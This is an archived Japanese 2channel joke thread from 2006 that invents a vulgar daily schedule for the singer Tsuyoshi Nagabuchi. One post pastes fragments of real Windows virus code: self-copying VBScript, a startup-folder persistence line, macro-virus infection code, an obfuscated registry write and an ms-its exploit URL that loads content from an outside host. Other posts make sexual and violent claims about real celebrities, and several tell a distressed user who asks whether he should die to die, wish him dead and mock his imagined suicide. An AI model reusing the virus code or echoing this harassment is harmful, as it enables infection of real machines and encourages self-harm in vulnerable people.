5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

長渕剛の1日 二日目

1 :伝説の名無しさん:2006/07/10(月) 23:49:53
前スレ
長渕剛の1日
http://music4.2ch.net/test/read.cgi/legend/1147673649/

2 :伝説の名無しさん:2006/07/11(火) 00:52:08
3:00
知障。

3 :伝説の名無しさん:2006/07/11(火) 09:56:55
4:00 ココアにジャムを入れ飲む。

4 :伝説の名無しさん:2006/07/11(火) 10:44:31
4:05 何か凄いことをヒラメタ!ので突然歩いて皇居へむかう


5 :伝説の名無しさん:2006/07/11(火) 11:20:59
4:10 通りすがりのカリスマTOSHIから一緒に脱糞しないかと誘われる

6 :伝説の名無しさん:2006/07/11(火) 11:43:32
4:20 VIPPERとともに長渕スレを荒らす

7 :伝説の名無しさん:2006/07/11(火) 13:47:00
5:00
皇居に到着。
長渕とその親衛隊らしき数名の男と共に鉄パイプで襲撃。
案の定すぐに警備員にとりおさえられるも「我、奇襲に成功せし!」と吠える。

8 :伝説の名無しさん:2006/07/11(火) 14:36:50
05:15
おもむろに携帯を取り出し、キヨに電話。
そして臭すぎる屁の音を聞かせる。

9 :伝説の名無しさん:2006/07/11(火) 18:44:46
キヨに着拒される

10 :伝説の名無しさん:2006/07/11(火) 19:09:44
はぁっ!ブーゥッブリブリグブッブブブゥゥゥウプォォ〜ん!

11 :伝説の名無しさん:2006/07/11(火) 20:20:13
5:20
しかたないので今度はツネに臭すぎる屁の音を聞かせようと電話するも
「現在この番号は使われておりません」と言われ、フルチンのまま途方に暮れる

12 :伝説の名無しさん:2006/07/11(火) 22:37:08
三十路ウジ虫おさない野郎、またしても線路内へ。死にに行く。

13 :伝説の名無しさん:2006/07/11(火) 23:18:42

また長渕スレが立ってんなw
ほっとくと何本立つかわからん

14 :伝説の名無しさん:2006/07/12(水) 00:29:54
0:30
盗んだバイクを返しにいく

15 :伝説の名無しさん:2006/07/12(水) 15:33:42
1:00 バイクの持ち主の家の敷地に入ったとたん、落とし穴に落ちる

16 :伝説の名無しさん:2006/07/12(水) 19:14:24
1:03
落とし穴の中から上を見上げると、そこにはイヤらしい笑みを浮かべてこちらを見ているロンブー淳の姿が。

17 :伝説の名無しさん:2006/07/12(水) 22:56:33
三十路ウジ虫おさない野郎、電車が近づいてくる音を聞いてこわくなり、またホームに登る

18 :伝説の名無しさん:2006/07/13(木) 00:11:58
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

19 :伝説の名無しさん:2006/07/13(木) 00:25:39
0:30
仕事(空き巣)へ出発

20 :伝説の名無しさん:2006/07/13(木) 01:29:08
0:50
三十路ウジ虫おさない野郎、今度は地下鉄のホームに。線路に降りて横たわろうとすてる。

21 :伝説の名無しさん:2006/07/13(木) 12:57:36
1:00
髪を切る。

22 :カリスマTOSHI:2006/07/13(木) 13:12:30
僕のパンツは日々脱糞脱尿と特大の屁など数々の死線をくぐり抜けてきた英雄であります!
アアァアンァァンァァア〜ッ!!ビチョゥォッ!ブリブリブーォーッッツブブルブリブォオッ〜ン!


23 :伝説の名無しさん:2006/07/13(木) 13:38:14

「40過ぎてなにやってんだ!喝っ!」

24 :あぼーん:あぼーん
あぼーん

25 :伝説の名無しさん:2006/07/13(木) 18:10:30
1:10 鏡につるっぱげの自分が映ってるのを見て驚く

26 :伝説の名無しさん:2006/07/13(木) 21:19:04
21:00
「一緒や!打っても!」

27 :伝説の名無しさん:2006/07/14(金) 01:48:59
1:50
寝糞をする

28 :伝説の名無しさん:2006/07/14(金) 14:16:44
2:30 浮気をしたことを悦子にばれ殴られる

29 :伝説の名無しさん:2006/07/14(金) 20:42:23
2:40
そのままセックスに突入。

30 :伝説の名無しさん:2006/07/14(金) 22:11:42
2:41
悦子に顔射してまた殴られる

31 :伝説の名無しさん:2006/07/14(金) 22:30:34
2:45
お詫びに悦子の聖水を直飲み

32 :伝説の名無しさん:2006/07/15(土) 17:03:44
17:00
iPodにお気に入りのアニソンを転送

33 :伝説の名無しさん:2006/07/16(日) 11:19:20
18:00
キヨとの夜のプレイに備え、チンチンを剥いて洗う。

34 :伝説の名無しさん:2006/07/16(日) 14:40:24
14;30
松屋の店員にキレまくり

35 :伝説の名無しさん:2006/07/16(日) 15:27:05
14:40 金を払わず店外に出るが、通りかかった警官に無銭飲食で捕まる

36 :伝説の名無しさん:2006/07/16(日) 16:04:48
14:50
毅然とした振る舞いの、その警官がキヨそっくりなんで、ついつい一目惚れ。

37 :伝説の名無しさん:2006/07/17(月) 19:57:56
18:00
下半身を出し街をフラフラ歩いていたら、安田大サーカスの団長を見かける。
声をかけたが無視されたので長渕キックを見舞う。
翌日新聞を見てると
「阪神タイガース鳥谷選手、変質者に暴行される。」
と写真付きの記事があり、昨日は人間違いだったと気付く。

38 :伝説の名無しさん:2006/07/18(火) 09:41:29
0:00 寝ぼけて山田花子にラブコールの電話をかける

39 :伝説の名無しさん:2006/07/18(火) 15:33:36
0:30
のり弁を買う。
オツリの中に発見したギザ十に歓喜する。

40 :伝説の名無しさん:2006/07/18(火) 16:19:31
0:31
おいはぎに遭いギザ十をパクられる

41 :伝説の名無しさん:2006/07/18(火) 18:59:15
0:32
おいはぎに、怒りの長渕キック炸裂!

42 :伝説の名無しさん:2006/07/18(火) 19:23:11
0:32
おいはぎのHPダメージ0

<おいはぎの攻撃

おいはぎはパルプンテを唱えた

43 :伝説の名無しさん:2006/07/18(火) 21:03:39
0時40分
三十路ウジウジおさない野郎、テレビゲーム終了。死ににいく。

44 :伝説の名無しさん:2006/07/18(火) 21:26:40
0時41分
三十路ウジウジおさない野郎ってオレの事か?とキヨに相談

45 :伝説の名無しさん:2006/07/19(水) 02:02:31
2:00
アレを投与

46 :伝説の名無しさん:2006/07/19(水) 06:22:03
三十路ウジウジおさないって長渕とは関係ないよ。ヲタでもないらしい。
もともと、他のスレで相談厨房してたんだけ、誰にも相手されなくて、
つよしのスレならいい人がいそうだから、って来てるだけらしい。
どうしてそう思ったかは疑問けどw


47 :伝説の名無しさん:2006/07/19(水) 23:13:17
23:00
脱糞後、ウンコに尻毛が混ざっているのを発見。
思わず手をのばして匂いを嗅いでみる。

48 :伝説の名無しさん:2006/07/20(木) 09:39:47
23:01
信じられないほどの臭さに気絶。
10分後に意識を取り戻し、
その後同じ行動を6回繰り返す。

49 :伝説の名無しさん:2006/07/20(木) 10:55:02
三十路ウジウジおさない野郎、電車にひかれる。
クビがちぎれる。

50 :伝説の名無しさん:2006/07/20(木) 11:12:51
ちょww 氏んだかwww

51 :伝説の名無しさん:2006/07/20(木) 12:44:49
23:05
その光景を覗き見していた悦子は離婚を決意。
翌朝単身でサニー千葉のもとへ旅立つ。

52 :伝説の名無しさん:2006/07/20(木) 13:16:10
01:00
道中、腹がへったのでロボビタンAを投入。
HP回復、野球センス○がみについた。

53 :伝説の名無しさん:2006/07/20(木) 13:18:01
23:58
尻毛を頭部に付けて増毛することを決意。

54 :伝説の名無しさん:2006/07/20(木) 17:50:25
7:30
テーブル上に悦子からの置き手紙を見付け、3度読みなおす。
怒りを押さえ切れず、千葉との果たし合いを決意する。

55 :伝説の名無しさん:2006/07/20(木) 18:40:43
8:00
その前にテレクラに電話しテレHを楽しむ。

56 :伝説の名無しさん:2006/07/20(木) 19:33:40
8:30 千葉との待ち合わせ場所に向かうが、到着したとたん千葉の乗った車に撥ね飛ばされる

57 :伝説の名無しさん:2006/07/20(木) 19:37:27
三十路ウジ虫おさない野郎、フカーツw

58 :伝説の名無しさん:2006/07/21(金) 00:51:00
0:50
眠れない・・・。アレを投与

59 :伝説の名無しさん:2006/07/21(金) 11:52:58
三十路ウジ虫おさない野郎、お前死んだんじゃなかったのかよ?
とっとと死ねよ!ウジ虫!死ね!死ね!死ね!

60 :伝説の名無しさん:2006/07/21(金) 13:11:36
0:51
「うぉぉぉぉっ!アンチ・クライストオォォォゥッ!」

61 :伝説の名無しさん:2006/07/21(金) 19:18:48
1:00 チャットに参加する

62 :伝説の名無しさん:2006/07/22(土) 00:30:06
1:15
レスの最後に
「せいやっ」
と入れてしまい、みんなに正体がばれ、「ハゲは帰れ。」と罵られる。

63 :伝説の名無しさん:2006/07/22(土) 04:52:50
三十路ウジ虫おさない野郎、ビルの屋上に登る。

64 :伝説の名無しさん:2006/07/22(土) 08:53:06
9:00
あんぱんと牛乳を万引き

65 :伝説の名無しさん:2006/07/22(土) 15:21:42
あのう、、
長渕のスレの奴らって本当、いい人多いって思って。
ちょっとおれの相談も聞いてくれるないかな。
おれは長渕は興味なくて音楽全般のファン。有名大学入ったんだけど
まわりの皆が就職決めてるのに、おれだけ引っ込み思案で面接が突破
できず決まんなかったんだ。皆だんだん俺にきをつかってくれるのが
わかってつらくてさ。おれプライドすごい高いから、「会社なんかい
くきないよ俺は音楽好きだから 苦笑」ってごまかして、ひっしに裏
で就職活動してたんだ。でもどこも駄目だった。それで音楽家志望の
ふりするために、卒業の時にがんがって作品集作ったんだけど、それ
がまたセンスのないしょぼいゲーム音楽みたいなヤツで、もうさんざ
んでさ。今はもう三十路なのにまだブラブラ。完全にニートの駄目人
生なんだ。だから2ちゃんで一日中うさばらししてるんだ。こんな俺
、どうしたらいいかな?死んだ方がいいのかな。



66 :伝説の名無しさん:2006/07/22(土) 15:22:16
>>319
おお、レスありがとう。うれしくて泣きそうだよ。
全くその通り。実績なんかできるはずないんだ。
だって就職できないことをごまかすためにいいわけで音楽やってるだけだから。
全然自信ないし。評価もされないし。30過ぎても変わらない。
もう最近、自分の音楽がゲーム音楽みたいに全然通用しないっていうことに自分でも気付き始めてさ。
友達はさいわいいるよ。俺がこういううじうじしたどうしようもない人間で自分に自信がないから、謙虚さだけはあるから。似たような駄目連中ばっかだけどね。
でも俺の音楽をいいと言ってくれる人って、友人ばっかな事にある日気付いたんだ。音楽をプロ目指して本気でやってる人達はみんなはなれていっちゃった。
あたりまえだよね、こんな才能じゃ。
俺のいいわけグセはかなり重傷。音楽の才能ないのに負けず嫌いだから。
もう俺が言い訳をするのを聞いて友人が飽きれてるのが分かるんだ。
男らしくないと思う。男らしい友人はみんな離れていったなあ。
うじうじうじうじしてしまう。


67 :伝説の名無しさん:2006/07/22(土) 15:23:58
やっぱり長渕ファンって、他人には興味ないみたいだね。
ここは相談スレでもないのに、まだまだおさない自分です。 
医療スレで相談することにします。
またなにかあったら報告に来ますね。


68 :伝説の名無しさん:2006/07/22(土) 15:30:30
誰かこのウジ虫殺してやれよ。いい加減ウザイ。

69 :伝説の名無しさん:2006/07/22(土) 16:06:25
07:21
欽「長渕〜、チームなくなっちゃったよ〜」

70 :伝説の名無しさん:2006/07/22(土) 20:45:38
長渕さんは何処に住んでる?

71 :伝説の名無しさん:2006/07/22(土) 22:55:59
23:00
ひどい自演を見て絶句。
そしてものすごく臭い屁を一発。

72 :伝説の名無しさん:2006/07/23(日) 03:45:26
24:00
ケツが僕に何かを語りかける

73 :伝説の名無しさん:2006/07/23(日) 14:22:10
1:00
ケツの独り言に驚き、三面鏡に毛だらけアナルを映してみる。

74 :伝説の名無しさん:2006/07/23(日) 15:51:18
ケツ「解雇トゥェイィウ…」

長渕にはそう聞こえた。


75 :伝説の名無しさん:2006/07/23(日) 16:18:38
1:01 下痢を起こし糞が出るところを鏡ごしに見る

76 :伝説の名無しさん:2006/07/23(日) 16:27:00
ひがむ。ああ、才能のなきことは悲しき哉。センスゼロ。周囲の優れてる人がうらやましい。
悔しいのでバカブログを開陳。攻撃するも、あまりのバカさにかえって周囲の失笑を買う。

77 :伝説の名無しさん:2006/07/23(日) 21:53:44
三十路ウジ虫おさない野郎、65 66 67 の書かれたビラを、ビルの屋上から垂らす

78 :伝説の名無しさん:2006/07/23(日) 22:06:30
3:00
「渕ヲタ工作員必死だなw」と伝説板を見て呟く。

79 :伝説の名無しさん:2006/07/23(日) 23:13:08
0:00
ブームに乗って青春パンクバンド結成。


80 :伝説の名無しさん:2006/07/23(日) 23:35:02
4:00
つまらないので桑田スレにアナル接写画像を貼りつけまくる。

81 :伝説の名無しさん:2006/07/24(月) 00:08:03
0:00
ライブで桑田が悪口を言ってたという書き込みを見つける

82 :伝説の名無しさん:2006/07/24(月) 04:56:15
5:00
最近清原とご無沙汰なので、久々に派手なプレイをと思い電話するが
阪神の藤川と裸の直球勝負中で、とりあってもらえない。

83 :伝説の名無しさん:2006/07/24(月) 05:21:42
6:00
鼓動が止まる

84 :伝説の名無しさん:2006/07/24(月) 10:26:13
>>77
ワロタw

85 :伝説の名無しさん:2006/07/24(月) 13:04:22
三十路ウジ虫おさない野郎、誰にも相手にされず、断念。
そのビルから投身自殺。

86 :伝説の名無しさん:2006/07/24(月) 14:05:10
それを長渕がキャッチ♪

87 :伝説の名無しさん:2006/07/24(月) 14:24:26
7:00
アナルに電流を流す。勃起後心臓が動きだす。
そして臭すぎる屁を豪快に一発。

88 :伝説の名無しさん:2006/07/24(月) 14:30:35
ここさ、アンチ板じゃないんだから
アンチはアンチ板に行けよ



89 :伝説の名無しさん:2006/07/24(月) 16:15:43
8:00 山本圭一をボコボコにする

90 :伝説の名無しさん:2006/07/24(月) 18:26:50
8:15
おとなしくなった山本の口に、いきり立ったブツをねじ込む。

91 :伝説の名無しさん:2006/07/24(月) 18:31:58
8:30
鬼籍に入る

92 :伝説の名無しさん:2006/07/24(月) 18:34:35
三十路ウジ虫おさない野郎、気絶。吐く。ウジウジ何か言っている。

93 :伝説の名無しさん:2006/07/24(月) 18:57:13
>>1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

94 :伝説の名無しさん:2006/07/24(月) 21:01:45
>>92
よそでやってくれ。
ここはハゲ渕のネタスレだからよ。

95 :伝説の名無しさん:2006/07/25(火) 15:17:19
27:00
あの人は今!?から出演オファーがきた。
もちろん断る。

96 :伝説の名無しさん:2006/07/26(水) 01:59:42
10:00
原宿でガナ渕と間違えられる

97 :伝説の名無しさん:2006/07/26(水) 07:55:54
三十路ウジ虫おさない野郎って書かれるのがイヤな奴が一匹いるようだな。










どうしてでしょう?       WWW

98 :伝説の名無しさん:2006/07/26(水) 09:25:51
10:10 前に歩いていた女子高生のスカートがまくれ、それを見たとたん勃起する。

99 :伝説の名無しさん:2006/07/26(水) 13:11:27
10:11
その女子高生が振り向き顔を見たとたん、自慢のイチモツが急激に収縮。

100 :伝説の名無しさん:2006/07/26(水) 13:15:47
>>97
>>94をよく読んでくれ。
長渕ネタを書かれるのが辛いなら、ここに来るな。
次来たら邦楽ソロ板荒らすぞ。

101 :伝説の名無しさん:2006/07/26(水) 13:39:43
三十路ウジ虫おさない野郎ってなんなの?
あのコピペ、なんかすごくマジレスだよね。

102 :伝説の名無しさん:2006/07/26(水) 14:39:24
三十路ウジ虫おさないに荒らされて良く思ってない人は多いからな。
ここに書き込んでるのもアンチじゃね?

103 :伝説の名無しさん:2006/07/26(水) 20:37:15
長渕がネタになって、みんな笑えたらいいじゃねぇか。
嫌なら渕ヲタはみなけりゃいいんだよ。
それと、なんとかおさない野郎ってのもウゼェな。
いちいちコピペするなてぇの。

104 :伝説の名無しさん:2006/07/27(木) 02:57:12
11:10
まぁみんな、そんなにカリカリすんなよ…
そんな思いを込めて、賽銭箱に100円玉を投げ入れたところ、
釣り銭出てくる代わりにヌガー菓子の王様「マーズ・バー」が5ダースも排出される。
嬉しさのあまり3ダースを一気食いして、銀歯がすべて外れる。
その後、バチに蹴っつまずき膝をすりむいたショックで脱糞。

105 :伝説の名無しさn:2006/07/27(木) 18:09:01
11:15 神社から出ようとすると神様が目の前に現れる

106 :伝説の名無しさん:2006/07/27(木) 18:21:13
11:17 降りてきた神に 「道場建てろ」と告げられる

107 :伝説の名無しさん:2006/07/27(木) 22:34:36
12:00
昼飯は石

108 :伝説の名無しさん:2006/07/28(金) 12:33:04
17:00
どうしてもミリオンヒットがほしいので
日本が誇るカルト宗教に入信決意。

109 :伝説の名無しさん:2006/07/28(金) 15:53:12
17:10 携帯がなり出ると「ゲキョ!!ゲキョ!!・・・・」と題目を唱える声が聞こえる

110 :伝説の名無しさん:2006/07/28(金) 16:22:15
17:20
さらに上を目指す為、久〇とベッドインしようと企む。

18 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)